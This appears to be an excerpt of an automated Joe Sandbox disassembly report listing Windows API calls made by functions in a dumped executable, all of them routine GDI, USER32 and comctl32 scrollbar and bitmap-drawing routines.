GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CE8
GetProcAddress.KERNEL32(00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CF8
GetProcAddress.KERNEL32(00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427D19
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427D3A
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB), ref: 00427D5B
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB), ref: 00427D7C
GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollPos,00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp), ref: 00427D9D
GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollInfo,00000000,FlatSB_SetScrollPos,00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp), ref: 00427DBE
GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollRange,00000000,FlatSB_SetScrollInfo,00000000,FlatSB_SetScrollPos,00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar), ref: 00427DDF

Strings

FlatSB_SetScrollProp, xrefs: 00427CE2
FlatSB_SetScrollInfo, xrefs: 00427DB8
FlatSB_GetScrollPos, xrefs: 00427D76
FlatSB_SetScrollPos, xrefs: 00427D97
FlatSB_GetScrollInfo, xrefs: 00427D55
InitializeFlatSB, xrefs: 00427CB2
FlatSB_ShowScrollBar, xrefs: 00427D13
FlatSB_GetScrollRange, xrefs: 00427D34
FlatSB_EnableScrollBar, xrefs: 00427CF2
comctl32.dll, xrefs: 00427C9E
UninitializeFlatSB, xrefs: 00427CC2
FlatSB_SetScrollRange, xrefs: 00427DD9
FlatSB_GetScrollProp, xrefs: 00427CD2

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0041FFE4, Relevance: 37.7, APIs: 25, Instructions: 248

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420027
SelectObject.GDI32(?,?), ref: 0042003C
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042008B
SelectObject.GDI32(?,?), ref: 004200A5
DeleteObject.GDI32(?), ref: 004200B1
CreateCompatibleDC.GDI32(00000000), ref: 004200C5
CreateCompatibleBitmap.GDI32(?,?,?), ref: 004200E6
SelectObject.GDI32(?,?), ref: 004200FB
SelectPalette.GDI32(?,0B080891,00000000), ref: 0042010F
SelectPalette.GDI32(?,?,00000000), ref: 00420121
SelectPalette.GDI32(?,00000000,000000FF), ref: 00420136
SelectPalette.GDI32(?,0B080891,000000FF), ref: 0042014C
RealizePalette.GDI32(?), ref: 00420158
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042017A
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0042019C
SetTextColor.GDI32(?,00000000), ref: 004201A4
SetBkColor.GDI32(?,00FFFFFF), ref: 004201B2
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004201DE
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420203
SetTextColor.GDI32(?,?), ref: 0042020D
SetBkColor.GDI32(?,?), ref: 00420217
SelectObject.GDI32(?,00000000), ref: 0042022A
DeleteObject.GDI32(?), ref: 00420233
SelectPalette.GDI32(?,00000000,00000000), ref: 00420255
DeleteDC.GDI32(?), ref: 0042025E

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0042398C, Relevance: 31.7, APIs: 21, Instructions: 194

APIs

GetObjectA.GDI32(?,00000054,?), ref: 004239AF
GetDC.USER32(00000000), ref: 004239DD
CreateCompatibleDC.GDI32(?), ref: 004239EE
CreateBitmap.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,00423B87,?,?,00000054,?), ref: 00423A09
SelectObject.GDI32(?,00000000), ref: 00423A23
PatBlt.GDI32(?,00000000,00000000,?,?,00000042,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000), ref: 00423A45
CreateCompatibleDC.GDI32(?), ref: 00423A53
DeleteDC.GDI32(?), ref: 00423B39

Part of subcall function 004232C4: GetObjectA.GDI32(00000000,00000054,?), ref: 00423344
Part of subcall function 004232C4: GetDC.USER32(00000000), ref: 00423355
Part of subcall function 004232C4: CreateCompatibleDC.GDI32(00000000), ref: 00423366
Part of subcall function 004232C4: CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000,00000000,00423912,?,00000000,00000000), ref: 004233B2
Part of subcall function 004232C4: CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 004233D6
Part of subcall function 004232C4: GetDeviceCaps.GDI32(00000028,0000000C), ref: 00423426
Part of subcall function 004232C4: GetDeviceCaps.GDI32(00000028,0000000E), ref: 00423433
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 004234DD
Part of subcall function 004232C4: GetDIBColorTable.GDI32(?,00000000,00000100,-00000027), ref: 00423503
Part of subcall function 004232C4: GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000001,00000000), ref: 0042352E
Part of subcall function 004232C4: SelectObject.GDI32(?,?), ref: 0042353B
Part of subcall function 004232C4: CreateDIBSection.GDI32(00000028,00000001,00000000,00000003,00000000,00000000), ref: 00423591
Part of subcall function 004232C4: GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000001,00000000), ref: 004235F2
Part of subcall function 004232C4: SelectObject.GDI32(?,?), ref: 00423633
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,00000000), ref: 00423673
Part of subcall function 004232C4: RealizePalette.GDI32(?), ref: 0042367F
Part of subcall function 004232C4: FillRect.USER32(?,?,00000000), ref: 004236D0
Part of subcall function 004232C4: SetTextColor.GDI32(?,00000000), ref: 004236E8
Part of subcall function 004232C4: SetBkColor.GDI32(?,00000000), ref: 00423702
Part of subcall function 004232C4: SetDIBColorTable.GDI32(?,00000000,00000002,?), ref: 0042374A
Part of subcall function 004232C4: PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062,00000000,00423890,?,00000000,004238B2,?,00000000,004238C3,?,?), ref: 0042376C
Part of subcall function 004232C4: CreateCompatibleDC.GDI32(00000028), ref: 0042377F
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 004237A2
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,00000000), ref: 004237BE
Part of subcall function 004232C4: RealizePalette.GDI32(?), ref: 004237C9
Part of subcall function 004232C4: SetTextColor.GDI32(?,00000000), ref: 004237E7
Part of subcall function 004232C4: SetBkColor.GDI32(?,00000000), ref: 00423801
Part of subcall function 004232C4: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423829
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,000000FF), ref: 0042383B
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 00423845
Part of subcall function 004232C4: DeleteDC.GDI32(?), ref: 00423860
Part of subcall function 004232C4: SelectPalette.GDI32(?,?,000000FF), ref: 0042388A

SelectObject.GDI32(?), ref: 00423A9B
SelectPalette.GDI32(?,?,00000000), ref: 00423AAE
RealizePalette.GDI32(?), ref: 00423AB7
SelectPalette.GDI32(?,?,00000000), ref: 00423AC3
RealizePalette.GDI32(?), ref: 00423ACC
SetBkColor.GDI32(?), ref: 00423AD6
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423AFA
SetBkColor.GDI32(?,00000000), ref: 00423B04
SelectObject.GDI32(?,00000000), ref: 00423B17
DeleteObject.GDI32 ref: 00423B23
SelectObject.GDI32(?,00000000), ref: 00423B54
DeleteDC.GDI32(00000000), ref: 00423B70
ReleaseDC.USER32(00000000,00000000), ref: 00423B81

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00424708, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351

APIs

GetDC.USER32(00000000), ref: 00424972
CreateCompatibleDC.GDI32(00000001), ref: 004249D7
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 004249EC
SelectObject.GDI32(?,00000000), ref: 004249F6
DeleteObject.GDI32(00000000), ref: 00424AA9

Part of subcall function 00420530: CreateCompatibleDC.GDI32(00000000), ref: 00420549
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420552
Part of subcall function 00420530: GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420572
Part of subcall function 00420530: DeleteDC.GDI32(00000000), ref: 00420578
Part of subcall function 00420530: CreatePalette.GDI32 ref: 004205BE

SelectPalette.GDI32(?,?,00000000), ref: 00424A26
RealizePalette.GDI32(?), ref: 00424A32
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00424A56
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00424AAF,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00424A64
SelectPalette.GDI32(?,00000000,000000FF), ref: 00424A96
SelectObject.GDI32(?,?), ref: 00424AA3
CreateDIBSection.GDI32(00000001,?,00000000,00000000,00000000,00000000), ref: 00424AF4
GetLastError.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,00424B73,?,00000000,?,00000000,00424C25,?,?), ref: 00424B08

Part of subcall function 0040B04C: GetLastError.KERNEL32(00000000,0040B0DC), ref: 0040B066

ReleaseDC.USER32(00000000,00000001), ref: 00424B6D

Strings

BM, xrefs: 0042482C
(, xrefs: 004248C1

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00458D4C, Relevance: 23.0, APIs: 15, Instructions: 468

APIs

Part of subcall function 00423928: GetObjectA.GDI32(?,00000004), ref: 00423941
Part of subcall function 00423928: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042396D
Part of subcall function 00423928: CreatePalette.GDI32(?), ref: 00423977

Part of subcall function 0041F4D8: StretchBlt.GDI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 0041F542

SetTextColor.GDI32(00000000,00000000), ref: 0045900C
SetBkColor.GDI32(00000000,00FFFFFF), ref: 00459017
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 0045903A
SetTextColor.GDI32(00000000,00000000), ref: 0045908F
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0045909A
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 004590BD

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

SetTextColor.GDI32(00000000,00000000), ref: 0045911A
SetBkColor.GDI32(00000000,00FFFFFF), ref: 00459125
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 00459148

Part of subcall function 0041F654: FillRect.USER32(?,00000000,00000000), ref: 0041F67C

SetTextColor.GDI32(00000000,00000000), ref: 00459208
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0045921A
BitBlt.GDI32(00000000,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 00459244
SetTextColor.GDI32(00000000,00000000), ref: 00459260
SetBkColor.GDI32(00000000,00FFFFFF), ref: 00459272
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 0045929C

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00423E90, Relevance: 21.2, APIs: 14, Instructions: 217

APIs

Part of subcall function 00424420: GetDC.USER32(00000000), ref: 00424476
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
Part of subcall function 00424420: CreateHalftonePalette.GDI32(00000000), ref: 004244B9
Part of subcall function 00424420: ReleaseDC.USER32(00000000,00000000), ref: 004244C4

SelectPalette.GDI32(?,?,000000FF), ref: 00423ED2
RealizePalette.GDI32(?), ref: 00423EE1
GetDeviceCaps.GDI32(?,0000000C), ref: 00423EF3
GetDeviceCaps.GDI32(?,0000000E), ref: 00423F02
GetBrushOrgEx.GDI32(?,?), ref: 00423F36
SetStretchBltMode.GDI32(?,00000004), ref: 00423F44
SetBrushOrgEx.GDI32(?,?,?), ref: 00423F5C
SetStretchBltMode.GDI32(00000000,00000003), ref: 00423F79
SelectPalette.GDI32(?,?,000000FF), ref: 004240C7

Part of subcall function 004243C0: DeleteObject.GDI32(?), ref: 004243E3

CreateCompatibleDC.GDI32(00000000), ref: 00423FD9
SelectObject.GDI32(?,?), ref: 00423FEE

Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420027
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 0042003C
Part of subcall function 0041FFE4: MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042008B
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200A5
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 004200B1
Part of subcall function 0041FFE4: CreateCompatibleDC.GDI32(00000000), ref: 004200C5
Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,?,?), ref: 004200E6
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200FB
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,0B080891,00000000), ref: 0042010F
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,?,00000000), ref: 00420121
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,000000FF), ref: 00420136
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,0B080891,000000FF), ref: 0042014C
Part of subcall function 0041FFE4: RealizePalette.GDI32(?), ref: 00420158
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042017A
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0042019C
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,00000000), ref: 004201A4
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,00FFFFFF), ref: 004201B2
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004201DE
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420203
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,?), ref: 0042020D
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,?), ref: 00420217
Part of subcall function 0041FFE4: SelectObject.GDI32(?,00000000), ref: 0042022A
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 00420233
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,00000000), ref: 00420255
Part of subcall function 0041FFE4: DeleteDC.GDI32(?), ref: 0042025E

SelectObject.GDI32(?,00000000), ref: 0042404D
DeleteDC.GDI32(00000000), ref: 0042405C
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 004240A2

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0041FE50, Relevance: 21.1, APIs: 14, Instructions: 131

APIs

CreateCompatibleDC.GDI32(00000000), ref: 0041FE67
CreateCompatibleDC.GDI32(00000000), ref: 0041FE71
GetObjectA.GDI32(?,00000018,?), ref: 0041FE91
CreateBitmap.GDI32(?,?,00000001,00000001,00000000,00000000,0041FF9E,?,00000000), ref: 0041FEA8
GetDC.USER32(00000000), ref: 0041FEB4
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0041FEE1
ReleaseDC.USER32(00000000,00000000), ref: 0041FF07

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

SelectObject.GDI32(?,?), ref: 0041FF22
SelectObject.GDI32(?,00000000), ref: 0041FF31
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041FF5D
SelectObject.GDI32(?,00000000), ref: 0041FF6B
SelectObject.GDI32(?,00000000), ref: 0041FF79
DeleteDC.GDI32(?), ref: 0041FF8F
DeleteDC.GDI32(?), ref: 0041FF98

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043E4E4, Relevance: 19.7, APIs: 13, Instructions: 213

APIs

GetWindowDC.USER32(00000000), ref: 0043E518
GetClientRect.USER32(00000000,?), ref: 0043E53B
GetWindowRect.USER32(00000000,?), ref: 0043E54D
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0043E563
OffsetRect.USER32(?,?,?), ref: 0043E578
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0043E591
InflateRect.USER32(?,?,?), ref: 0043E5AF
GetWindowLongA.USER32(00000000,000000F0), ref: 0043E605
DrawEdge.USER32(?,?,00000000,00000008), ref: 0043E6D1
IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043E6EA
OffsetRect.USER32(?,?,?), ref: 0043E709

Part of subcall function 0041F29C: CreateBrushIndirect.GDI32(?), ref: 0041F346

FillRect.USER32(?,?,00000000), ref: 0043E725
ReleaseDC.USER32(00000000,?), ref: 0043E744

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00426938, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 00426971
GetSystemMetrics.USER32(00000000), ref: 00426996
GetSystemMetrics.USER32(00000001), ref: 004269A1
GetClipBox.GDI32(?,?), ref: 004269B3
GetDCOrgEx.GDI32(?,?), ref: 004269C0
OffsetRect.USER32(?,?,?), ref: 004269D9
IntersectRect.USER32(?,?,?), ref: 004269EA
IntersectRect.USER32(?,?,?), ref: 00426A00
IntersectRect.USER32(?,?,?), ref: 00426A20

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

EnumDisplayMonitors, xrefs: 00426950

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00423E8E, Relevance: 16.7, APIs: 11, Instructions: 165

APIs

Part of subcall function 00424420: GetDC.USER32(00000000), ref: 00424476
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
Part of subcall function 00424420: CreateHalftonePalette.GDI32(00000000), ref: 004244B9
Part of subcall function 00424420: ReleaseDC.USER32(00000000,00000000), ref: 004244C4

SelectPalette.GDI32(?,?,000000FF), ref: 00423ED2
RealizePalette.GDI32(?), ref: 00423EE1
GetDeviceCaps.GDI32(?,0000000C), ref: 00423EF3
GetDeviceCaps.GDI32(?,0000000E), ref: 00423F02
GetBrushOrgEx.GDI32(?,?), ref: 00423F36
SetStretchBltMode.GDI32(?,00000004), ref: 00423F44
SetBrushOrgEx.GDI32(?,?,?), ref: 00423F5C
SetStretchBltMode.GDI32(00000000,00000003), ref: 00423F79
SelectPalette.GDI32(?,?,000000FF), ref: 004240C7

Part of subcall function 004243C0: DeleteObject.GDI32(?), ref: 004243E3

CreateCompatibleDC.GDI32(00000000), ref: 00423FD9
SelectObject.GDI32(?,?), ref: 00423FEE

Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420027
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 0042003C
Part of subcall function 0041FFE4: MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042008B
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200A5
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 004200B1
Part of subcall function 0041FFE4: CreateCompatibleDC.GDI32(00000000), ref: 004200C5
Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,?,?), ref: 004200E6
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200FB
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,0B080891,00000000), ref: 0042010F
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,?,00000000), ref: 00420121
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,000000FF), ref: 00420136
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,0B080891,000000FF), ref: 0042014C
Part of subcall function 0041FFE4: RealizePalette.GDI32(?), ref: 00420158
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042017A
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0042019C
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,00000000), ref: 004201A4
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,00FFFFFF), ref: 004201B2
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004201DE
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420203
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,?), ref: 0042020D
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,?), ref: 00420217
Part of subcall function 0041FFE4: SelectObject.GDI32(?,00000000), ref: 0042022A
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 00420233
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,00000000), ref: 00420255
Part of subcall function 0041FFE4: DeleteDC.GDI32(?), ref: 0042025E

SelectObject.GDI32(?,00000000), ref: 0042404D
DeleteDC.GDI32(00000000), ref: 0042405C
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 004240A2

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043B8BC, Relevance: 16.6, APIs: 11, Instructions: 133

APIs

Part of subcall function 0043B3DC: BeginPaint.USER32(00000000,?), ref: 0043B402
Part of subcall function 0043B3DC: SaveDC.GDI32(?), ref: 0043B436
Part of subcall function 0043B3DC: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0043B498
Part of subcall function 0043B3DC: RestoreDC.GDI32(?,?), ref: 0043B4C2
Part of subcall function 0043B3DC: EndPaint.USER32(00000000,?), ref: 0043B4F6

